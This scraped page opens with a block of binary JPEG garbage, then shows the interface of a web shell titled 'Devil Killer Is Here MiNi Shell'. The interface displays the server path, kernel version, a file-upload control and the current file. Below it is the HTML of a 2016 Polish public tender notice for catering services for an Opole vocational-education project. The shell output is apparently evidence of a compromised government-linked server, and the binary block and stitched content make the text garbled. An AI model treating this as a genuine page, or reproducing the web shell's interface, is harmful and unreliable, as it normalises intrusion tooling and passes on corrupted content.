JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161007/320110-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 320110 - 2016
              z dnia 2016-10-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Opole: Świadczenie usług cateringowych na potrzeby projektu Opolskie szkolnictwo zawodowe bliżej rynku pracy 2 realizowanego przez Opolskie Centrum Rozwoju Gospodarki<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Projekt pn. Opolskie szkolnictwo zawodowe bliżej rynku pracy 2 współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2014-2020, oś priorytetowa IX. Wysoka jakość edukacji, Poddziałanie 9.2.1 Wsparcie kształcenia zawodowego</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Opolskie Centrum Rozwoju Gospodarki, krajowy numer identyfikacyjny
              16012870100000, ul.
              ul. Krakowska 
              38,
              45075  
              Opole, woj.
              opolskie, państwo
              , tel.
              77 40 33 600, e-mail
              biuro@ocrg.opolskie.pl, faks
              77 40 33 609.
              <br />
              Adres strony internetowej (URL): http://www.ocrg.opolskie.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.ocrg.opolskie.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.ocrg.opolskie.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Opolskie Centrum Rozwoju Gospodarki , ul. Krakowska 38, 45-075 Opole</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług cateringowych na potrzeby projektu Opolskie szkolnictwo zawodowe bliżej rynku pracy 2 realizowanego przez Opolskie Centrum Rozwoju Gospodarki<br /><b>Numer referencyjny: </b>DOA/323/20/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Nazwa zmówienia: Świadczenie usług cateringowych na potrzeby projektu Opolskie szkolnictwo zawodowe bliżej rynku pracy 2 realizowanego przez Opolskie Centrum Rozwoju Gospodarki.Przedmiot zamówienia podzielony został na 2 zadania (części) tj.: Zadanie nr 1: Świadczenie usług cateringowych na potrzeby spotkań, warsztatów i wizyt przygotowawczych w ramach projektu 9.2.1 Opolskie szkolnictwo zawodowe bliżej rynku pracy 2 współfinansowanego ze środków RPO WO 2014-2020. Zadanie nr 2: Świadczenie usług cateringowych w trakcie wyjazdów szkoleniowych i spotkań roboczych multidyscyplinarnych zespołów kreatywnego myślenia "design thinking" organizowanych przez OCRG w ramach projektu nr RPOP.09.02.01-16-0028/15 pn. Opolskie Szkolnictwo Zawodowe bliżej rynku pracy 2, współfinansowanego ze środków RPO WO 2014-2020. Zamówienie realizowane jest w ramach projektu pn. Opolskie szkolnictwo zawodowe bliżej rynku pracy 2 współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2014-2020, oś priorytetowa IX. Wysoka jakość edukacji, Poddziałanie 9.2.1 Wsparcie kształcenia zawodowego. Szczegółowy opis przedmiotu zamówienia zawarty został w zał. nr 1A i 1B do SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>55520000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/06/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>klauzule społeczne</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />W zadaniu nr 1 dopuszcza się zmianę istotnych postanowień umowy w następującym zakresie i przy spełnieniu następujących warunków:
1)	zmiana terminu realizacji umowy określonego w § 1 ust. 1 w przypadku zmiany terminu realizacji projektu 9.2.1 Opolskie Szkolnictwo zawodowe bliżej rynku pracy 2 współfinansowanego ze środków RPO WO 2014  2020.
2)	zmiana rozbieżnych lub niejasnych postanowień umowy, o ile zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów,
3)	poprawienia błędów i oczywistych omyłek słownych, literowych i liczbowych, zmiana układu graficznego umowy lub numeracji jednostek redakcyjnych, niepowodujące zmiany celu i istoty umowy, 
4)	uszczegółowienie, wykładnia lub doprecyzowanie poszczególnych zapisów umowy, niepowodujące zmiany celu i istoty umowy.
W zadaniu nr 2 dopuszcza się zmianę istotnych postanowień umowy w następującym zakresie i przy spełnieniu następujących warunków:
1)	zmiana terminu realizacji umowy określonego w § 1 ust. 3 w przypadku zmiany terminu realizacji projektu 9.2.1  pn. Opolskie Szkolnictwo Zawodowe bliżej rynku pracy 2 współfinansowanego ze środków RPO WO 2014  2020.
2)	zmiana rozbieżnych lub niejasnych postanowień umowy, o ile zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów,
3)	poprawienia błędów i oczywistych omyłek słownych, literowych i liczbowych, zmiana układu graficznego umowy lub numeracji jednostek redakcyjnych, niepowodujące zmiany celu 
i istoty umowy, 
4)	zwiększenie ilości dostarczonych zestawów śniadaniowych i poczęstunków obiadowych 
o maksymalnie 10% wartości przedmiotowego zamówienia określonego w § 2 ust. 3,
5)	uszczegółowienie, wykładnia lub doprecyzowanie poszczególnych zapisów umowy, niepowodujące zmiany celu i istoty umowy.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 17/10/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
